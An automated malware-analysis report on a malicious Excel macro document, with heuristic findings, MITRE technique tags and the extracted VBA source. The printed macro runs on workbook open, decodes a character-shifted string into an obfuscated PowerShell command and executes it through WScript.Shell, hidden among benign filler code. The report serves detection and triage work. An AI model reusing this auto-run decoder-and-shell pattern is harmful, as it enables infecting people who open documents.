MALICIOUS
Risk Score: 232
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file is an OOXML document containing a Workbook_Open VBA macro. This macro utilizes CreateObject and WScript.Shell to execute obfuscated code that includes a URL, strongly indicating an attempt to download and execute a second-stage payload. The obfuscated nature of the script and the presence of a URL suggest downloader or dropper functionality.
Heuristics (8)
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project — VBA macros present.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: `lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"`
- Obfuscated VBA Shell command with URL (critical, OLE_VBA_OBFUSCATED_SHELL_URL): VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched line in script: `lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set vhzby = CreateObject(lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `Private Sub workbook_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: https://brightcarbon.com/ (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9839 bytes |

SHA-256: 1953a5aeb3eeadb3e8184c404200d29e4c3fa8fb4b418c6221a4df4f89121723

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 10 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub VBA_Presentation()
Dim PAplication As PowerPoint.Application
Dim PPT As PowerPoint.Presentation
Dim PPTSlide As PowerPoint.Slide
Dim PPTShapes As PowerPoint.Shape
Dim PPTCharts As Excel.ChartObject
Set PAplication = New PowerPoint.Application
PAplication.Visible = msoCTrue
PAplication.WindowState = ppWindowMaximized
End Sub
Private Sub workbook_open()
uml.sa
sda = gfdfsgfdf
End Sub
Sub InsertTextAtEndOfDocument()
ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "uml"
' Purpose : Displays a dialog box with a Hello World text message.
' Author : Jamie Garroch
' Date : 06MAY2019
' Website : https://brightcarbon.com/
'----------------------------------------------------------------------------------
Sub HelloWorld()
MsgBox "Hello World!", vbInformation + vbOKOnly, "This is my first VBA Macro"
End Sub
Sub sa()
nqg = kui(220) & kui(198) & kui(221) & kui(153) & kui(168) & kui(188) & kui(153) & kui(201) & kui(232) & kui(215) & kui(240) & kui(215) & kui(190) & kui(203) & kui(204) & kui(215) & kui(193) & kui(222) & kui(215) & kui(197) & kui(229) & kui(153) & kui(166) & kui(190) & kui(153)
On Error Resume Next
prezigsc = nqg
prntkeeanq (prezigsc)
End Sub
Sub dsffsdfds()
Dim PAplication As PowerPoint.Application
Dim PPT As PowerPoint.Presentation
Dim PPTSlide As PowerPoint.Slide
Dim PPTShapes As PowerPoint.Shape
Dim PPTCharts As Excel.ChartObject
Set PAplication = New PowerPoint.Application
PAplication.Visible = msoCTrue
PAplication.WindowState = ppWindowMaximized
Set PPT = PAplication.Presentations.Add
For Each PPTCharts In ActiveSheet.ChartObjects
Next PPTCharts
End Sub
Function prntkeeanq(ekrpxyknmkrdnzqyrkywprixgukrt As String)
yqefljepodsljyziktokcr = 11 - 11
hgfh = "bfgghd jhfg gdfg"
lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"
Set vhzby = CreateObject(lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol)
doatabrnwbndkkvbnbuido = vhzby.Run(ekrpxyknmkrdnzqyrkywprixgukrt, yqefljepodsljyziktokcr)
End Function
Sub InsertingSlide()
'
' Macro recorded #date# by Russell Proctor
'
ActiveWindow.View.GotoSlide Index:=ActivePresentation.Slides.Add(Index:=2, Layout:=ppLayoutText).SlideIndex
ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").Select
ActiveWindow.Selection.ShapeRange.TextFrame.TextRange.Select
ActiveWindow.Selection.ShapeRange.TextFrame.TextRange.Characters(Start:=1, Length:=0).Select
With ActiveWindow.Selection.TextRange
.Text = "Another Slide"
With .Font
.Name = "Arial"
.Size = 44
.Bold = msoFalse
.Italic = msoFalse
.Underline = msoFalse
.Shadow = msoFalse
.Emboss = msoFalse
.BaselineOffset = 0
.AutorotateNumbers = msoFalse
.Color.SchemeColor = ppTitle
End With
End With
End Sub
Function kui(fscv As Variant)
sdfgf = "ghtr bfgdfj 5t64"
kui = Chr(fscv - 121)
bvcxb = "gfdsg bvxcvv gsdg et vbdfb xbcvx"
End Function
Sub dsadsa()
ActiveWindow.View.GotoSlide Index:=ActivePresentation.Slides.Add(Index:=2, Layout:=ppLayoutText).SlideIndex
ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").Select
ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").TextFrame.TextRange.Text = "Another Slide"
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 31232 bytes |

SHA-256: ac6b85e940ac7f0111521a4103862302e6cd478eb99d3797dccd1a49a9b2df97

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 10 long base64-like blob(s))